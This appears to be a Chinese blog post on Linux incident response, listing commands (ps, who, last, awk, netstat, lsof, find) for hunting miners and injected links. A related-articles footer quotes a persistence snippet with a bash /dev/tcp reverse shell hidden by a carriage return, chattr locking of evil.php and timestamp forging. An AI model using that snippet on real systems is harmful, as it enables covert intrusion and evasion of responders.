Linux故障排查思路及常用命令

一颗小胡椒2022-05-03 22:14:53
Liunx应急一直都是安全行业中的重点,
由于是全命令行界面,排查起来也没那么方便,
也一直想做这方面的笔记,今天抽空来总结一下。

现场环境

如果是Linux系统的话,见过最多的是CentOS ,Linux是全命令界面的,
如果是Windows系统的话,一般是Windows server

常见应急问题

大多数应急常见的问题都是挖矿,或者是被植入菠菜
小部分是中了勒索病毒,如果是勒索病毒的话,看看360、腾讯有没有什么

排查思路及方法

本节将讲解一些基本的流程,以及一些常用的命令。

基本流程

  1. 接到应急指令后,一般都需要到客户现场去处理的,最好带上电脑和笔记本。
  2. 到达现场后,跟客户沟通,我方需要确认一些信息(我在Windows安全应急的第三篇有讲解一些), 方便定(shuai)位(guo)问题,后面客户可能会让你上机操作,或者是使用你自己电脑登录目标机器查找问题。
  3. 无论是挖矿还是菠菜,流程都差不多,
找出问题 –> 解决问题 –> 编写报告
有句传言道是:扫描一分钟,报告一个钟,
如果是菠菜的话,那要多注意注意是不是修改了网站配置文件还是直接在网页上植入入的链接。

进程排查命令

整理一些基本的命令,使用不分先后顺序

这里只简单说明,

服务器被入侵后,攻击者难免会利用恶意程序来达到自己的目的。

1. 查看当前系统状态(top)

top命令:可以持续的监视进程的信息。

挖矿应急通常优先使用top命令来查看系统进程,

一般挖矿病毒站用CPU比较大

2. 查看当前系统进程信息(ps)

ps命令:可以查看进程的瞬间信息。

常用参数:

  1. -a:显示现行终端机下的所有程序,包括其他用户的程序。
  2. -e:列出程序时,显示每个程序所使用的环境变量。
  3. -f:显示UID,PPIP,C与STIME栏位。

3. 查看非root运行的进程(ps)

命令:ps -U root -u root -N

4. 查看用户root运行的进程(ps)

命令:ps -u root

5. 查看有没有奇怪进程(ps)

命令:ps -aef | grep inetd

grep 是搜索命令

inetd 程序是一个Linux守护进程.

6. 检测隐藏进程(ps)

命令:ps -ef | awk '{print}' | sort -n |uniq >1

命令:ls /proc | sort -n |uniq >2

sort 命令将文本文件内容加以排序,可针对文本文件的内容,以行为单位来排序。-n 参数依照数值的大小排序。

uniq 命令用于检查及删除文本文件中重复出现的行列,一般与 sort 命令结合使用。

7. 检测系统守护进程(ls)

命令:ls /etc/crontab

任务及用户活动排查命令

说明:机器使用过程中难免会留下一些痕迹

1. 查看当前有谁登陆在服务器上(who)

who 命令查看当前登录用户(tty本地登陆 pts远程登录)

命令:who

w 命令查看系统信息,想知道某一时刻用户的行为

2. 查看当前登陆用户的IP信息(who)

命令:who -m

3. 查看近期用户登陆情况(last)

命令:last -n 5 ## -n 5 表示输出5条

4. 查看历史命令(history)

命令:history 5 ## 5 表示输出最近使用的5条命令

5. 查看空口令账号(awk)

**awk**是一种编程语言,用于对文本和数据进行处理的

语法:awk [options] ‘pattern{action}’ file

命令:awk -F: '($2=="")' /etc/shadow

没有的话啥都不输出

在没有options和pattern的情况下,可以使用cat命令

6. 查看uid为0的账号(awk)

命令:awk -F: '($3==0)' /etc/passwd

7. 查看uid为0的账号(grep)

命令:grep -v -E "^#" /etc/passwd | awk -F: '$3==0{print $1}'

8. 查看进程树是否所有异常进程存在一个父进程、判断进程的父子关系(pstree)

命令:pstree -p

网络排查命令

说明:挖矿病毒避免不了要跟主机通信

1. 列出本机所有的连接和监听的端口,查看有没有非法连接(netstat)

netstat 命令用来打印Linux中网络系统的状态信息。

常用参数:

  1. -a或–all:显示所有连线中的Socket。
  2. -c或–continuous:持续列出网络状态。
  3. -i或–interfaces:显示网络界面信息表单。
  4. l或–listening:显示监控中的服务器的Socket。
  5. -n或–numeric:直接使用ip地址,而不通过域名服务器。
  6. -t或–tcp:显示TCP传输协议的连线状况。
  7. -u或–udp:显示UDP传输协议的连线状况。

命令:netstat -lntp

2. 查看谁在使用某个端口(lsof)

lsof 命令用于查看你进程开打的文件,打开文件的进程,进程打开的端口(TCP、UDP)。

常用参数:

  1. -g:列出GID号进程详情;
  2. -d<文件号>:列出占用该文件号的进程;
  3. -i<条件>:列出符合条件的进程。(4、6、协议、:端口、 @ip )
  4. -p<进程号>:列出指定进程号所打开的文件;
  5. -u:列出UID号进程详情;

命令:lsof -i :22 # 看看谁在使用22端口

3. 查看多个进程号对应的文件信息(lsof)

命令:lsof -p 2,3 # 使用逗号分隔

4. 查看所有tcp网络连接信息(lsof)

命令:lsof -i tcp

5. 查看所有udp网络连接信息(lsof)

命令:lsof -i udp

文件排查命令

说明:服务器被入侵后,攻击者基本上都需要修改一些文件来维持脚本的

运行

1. 查看所有文件,包括隐藏的文件(ls)

ls 命令用来显示目标列表,不同类型的文件颜色也不同

常用参数:

  1. -a:显示所有文件及目录,包括隐藏文件
  2. -l:以长格式显示目录下的内容列表。
  3. -t:用文件和目录的更改时间排序

命令:ls -la

2. 查看文件路径(whereis)

命令:whereis filename

3. 查看文件创建时间(ls)

命令:ls -al filname

4. 查找最近24小时内修改过的文件(find)

命令:find ./ -mtime 0

find 命令用来在指定目录下查找文件。

参数 -mtime n 按照文件的更改时间来找文件,n为整数。

例:

  1. -mtime 0 表示文件修改时间距离当前为0天的文件,即距离当前时间不到1天(24小时)以内的文件。
  2. -mtime 1 表示文件修改时间距离当前为1天的文件,即距离当前时间1天(24小时-48小时)的文件。
  3. -mtime+1 表示文件修改时间为大于1天的文件,即距离当前时间2天(48小时)之外的文件
  4. -mtime -1 表示文件修改时间为小于1天的文件,即距离当前时间1天(24小时)之内的文件

5. 查找以.txt结尾的文件名(find)

命令:find / -name "*.txt"

忽略大小写,命令:find / -iname "*.txt"

6. 查找不是以.txt结尾的文件(find)

命令:find / ! -name "*.txt"

linux服务器ps
本作品采用《CC 协议》,转载必须注明作者和本文链接
假如你想要搭建一个Linux服务器,并且希望可以长期维护的话,就需要考虑安全性能与速度等众多因素。一份正确的linux基本安全配置手册就显得格外重要。#为删除你系统上的用户,用下面的命令:[root@c1gstudio]# userdel username#批量删除方式#这里删除"adm lp sync shutdown halt mail news uucp operator games gopher ftp "账号#如果你开着ftp等服务可以把ftp账号保留下来。for i in adm lp sync shutdown halt mail news uucp operator games gopher ftp ;do userdel $i ;done
"请用root用户执行此脚本!#最近启动时间?#运行时间(天)?#相同ID的用户?#密码过期(天)?#允许root远程登录?#僵尸进程数量?#自启动服务数量?"系统巡检脚本:Version $VERSION"
前言:Linux服务器是系统重要的业务运行平台,对服务器进行巡检能够及时发现服务器的隐患,以便于改善和优化服务器的性能;观察服务器的运行状况,及时对设备进行调整,保证服务器的24小时不间断的工作;以及采集网内服务器信息。在此,为了便于运维人员顺利的完成服务器巡检工作,小编写了此文档,希望对Linux服务器的巡检工作起到指导、帮助的作用。
一个基于 Linux 操作系统的服务器运行的同时,也会表征出各种各样参数信息。通常来说运维人员、系统管理员会对这些数据会极为敏感,但是这些参数对于开发者来说也十分重要,尤其当你的程序非正常工作的时候,这些蛛丝马迹往往会帮助快速定位跟踪问题。
黑客正在使用SSH暴力攻击来攻击弱密码Linux系统,并且部署Chaos后门。 根据GoSecure专家的说法,后门并不是真正的新玩意,并且是“sebd”Linux rootkit的组件之一,该组件在2013年开始使用,后来在HackForums提供免费下载。 现在看来,有人从sebd rootkit源代码中提取了后门,并将其重命名为“Chaos”,并将其用作Linux服务器攻击的第一阶段有效负载
虽然监控工具可以帮助我们解决大多数问题,但我们有时需要登录实例并运行一些标准的 Linux 性能工具。看他们通过十条命令在一分钟内对机器性能问题进行诊断。饱和是指资源的负载超出其处理能力的情况,可以作为请求队列的长度或等待时间来公开。当我们把 Linux 操作系统所有的关键一级计数器找完之后,就会得到这样一张图:这些命令的输出,有助于快速定位性能瓶颈。
Linux 维权实用技巧
2023-04-07 09:38:38
小技巧\r特性原理:shell 在解析 \r 时会忽略掉 \r 前的信息。cat其实默认使用是支持一些比如 \r 回车符 \n 换行符 \f 换页符、也就是这些符号导致的能够隐藏命令,使用cat -A可以看到真正的内容比如举例隐藏反弹shell#!mkdir /tmp/222;echo "bash -i >& /dev/tcp/ip/443 0>&1 &" > /tmp/222/1.sh;bash /tmp/222/1.sh;echo 'Hello world!cat如果不加-A参数,或者不实用vim或者文本方式打开正常运行效果文件锁定chattr +i evil.php??修改文件时间其中-m参数是不创建一个文件,需要对已存在的文件进行修改时间,若不加-m参数会创建一个文件touch -acmr 10-help-text 20-help-text
当企业发生网络安全事件时,急需第一时间进行处理,使企业的网络信息系统在最短时间内恢复正常工作,同时还需进一步查找入侵来源,还原入侵事故过程,给出解决方案与防范措施,为企业挽回或减少经济损失。 常见的网络安全事件:
由于需要连接远程 Linux 服务器,早期使用过 Putty,SecureCRT,后面主要使用 Xshell。 自从接触了 MobaXterm之后,个人感觉比 Xshell 更好用,堪称SSH客户端的神器啊! MobaXterm 和 Xshell 的关系,就像 IntelliJ IDEA 和 Eclipse 的关系一样,功能更加强大,效果更加炫酷。 接下来,介绍 MobaXterm 的下载、
一颗小胡椒
暂无描述